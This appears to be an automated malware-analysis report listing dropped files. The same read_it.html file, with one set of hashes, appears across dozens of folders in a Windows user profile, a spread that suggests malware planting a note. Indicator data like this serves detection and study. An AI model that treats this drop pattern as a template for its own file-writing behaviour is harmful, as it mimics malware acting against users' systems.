c:\users\ybz8btyyvts 7lfsqb0g\favorites\microsoft websites\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\favorites\links\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\downloads\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\documents\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\documents\_cbddoffkxknkhz\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\documents\zexpz8sanmxx\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\documents\outlook files\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\documents\my shapes\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\documents\my shapes\_private\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\desktop\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\desktop\pjq-ty1kqqwr93pndg\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\desktop\52bi-hhj3zfu3m69\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\contacts\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\mozilla\firefox\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\mozilla\firefox\profiles\5cb79syl.default\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\mozilla\firefox\profiles\5cb79syl.default\webapps\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\mozilla\firefox\profiles\5cb79syl.default\indexeddb\moz-safe-about+home\idb\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\mozilla\firefox\profiles\5cb79syl.default\bookmarkbackups\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\mozilla\firefox\crash reports\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\adobe\acrobat\10.0\security\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\adobe\acrobat\10.0\security\crlcache\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\adobe\acrobat\10.0\javascripts\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\locallow\sun\java\jre1.7.0_60\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\locallow\sun\java\deployment\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\locallow\sun\java\deployment\security\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\locallow\sun\java\au\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\locallow\adobe\acrobat\10.0\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\~nsu.tmp\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\temporary internet files\content.ie5\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\temporary internet files\content.ie5\j34qd0io\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\temporary internet files\content.ie5\793tk2yx\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\temporary internet files\content.ie5\53xuaco8\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\temporary internet files\content.ie5\4pep48ks\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\tr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\th\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\sv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\sr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\sl\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\sk\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\ru\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\ro\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\pt_pt\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\pt_br\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\pl\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\no\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\nl\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\lv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\lt\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\ko\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\ja\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\it\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\id\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\hu\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\hr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\hi\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\he\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\fr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\fil\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\fi\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\es\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\en\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\el\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\de\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\da\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\cs\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\ca\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\bg\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\ar\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\outlook logging\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\low\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\history\history.ie5\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\cookies\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\updates\e7cf176e110c211b\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\updates\e7cf176e110c211b\updates\0\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\thumbnails\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\startupcache\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
